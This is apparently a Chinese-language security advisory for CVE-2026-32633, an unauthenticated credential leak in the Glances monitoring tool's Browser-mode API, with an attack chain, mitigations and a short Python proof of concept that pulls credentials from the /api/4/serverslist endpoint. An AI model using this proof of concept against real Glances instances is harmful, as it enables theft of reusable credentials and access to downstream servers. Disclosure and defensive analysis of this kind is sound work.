IPBUF安全漏洞报告
English
CVE-2026-32633 CVSS 9.1 严重

CVE-2026-32633 Glances监控工具未认证凭证泄露漏洞

披露日期: 2026-03-18
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-32633
漏洞类型
敏感信息泄露
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Glances

相关标签

凭证泄露未认证访问信息泄露GlancesCVE-2026-32633pbkdf2HTTP Basic认证

漏洞概述

Glances是一款开源跨平台系统监控工具。在4.5.2之前的版本中,存在严重的安全漏洞。在Central Browser模式下,/api/4/serverslist端点返回的服务器对象包含敏感的HTTP Basic认证凭证。这些凭证使用pbkdf2派生的Glances认证密钥,当前端Glances Browser/API实例以非安全模式(未设置--password参数)启动时,该API端点完全无需认证即可访问。攻击者只需能够网络访问到Browser API,即可获取下游受保护Glances服务器的可重用凭证,严重危害内网安全。

技术细节

漏洞根源在于GlancesServersList.get_servers_list()方法返回的原始服务器对象在后台轮询期间被原地修改(in-place mutation),对象中的uri字段包含了嵌入式HTTP Basic凭证。凭证格式为:scheme://username:password@hostname:port。当实例启动时不使用--password参数(这在内网部署中很常见),/api/4/serverslist端点完全无认证保护。攻击者通过发送HTTP GET请求到该端点,即可获取所有下游服务器的认证凭证。由于使用pbkdf2派生的密钥,攻击者可以重放这些凭证访问其他Glances实例。

攻击链分析

STEP 1
步骤1
识别运行在Browser模式且未设置--password参数的Glances实例
STEP 2
步骤2
向http://<target>:61208/api/4/serverslist发送无认证HTTP GET请求
STEP 3
步骤3
解析返回的JSON响应,提取包含凭证的uri字段
STEP 4
步骤4
解码HTTP Basic认证凭证(格式:username:password)
STEP 5
步骤5
使用获取的凭证通过pbkdf2密钥访问下游受保护的Glances服务器

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # CVE-2026-32633 PoC - Unauthenticated credential disclosure # Target: Glances instance running in Browser mode without --password target_url = "http://<target_ip>:61208/api/4/serverslist" def exploit(): # No authentication required - this is the vulnerability response = requests.get(target_url) if response.status_code == 200: servers = response.json() print("[+] Successfully retrieved server list") print("[+] Extracted credentials:") credentials = [] for server in servers: if 'uri' in server: uri = server['uri'] print(f"[*] URI: {uri}") # Extract credentials from URI if '@' in uri: auth_part = uri.split('@')[0].split('://')[1] credentials.append(auth_part) return credentials else: print(f"[-] Request failed with status: {response.status_code}") return [] if __name__ == "__main__": creds = exploit() print(f"\n[+] Found {len(creds)} credential pairs")

影响范围

Glances < 4.5.2

防御指南

临时缓解措施
在启动Glances实例时添加--password参数启用认证;或者使用防火墙限制对61208端口的访问,仅允许受信任的IP地址访问API端点;升级到4.5.2版本以获得官方安全修复。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表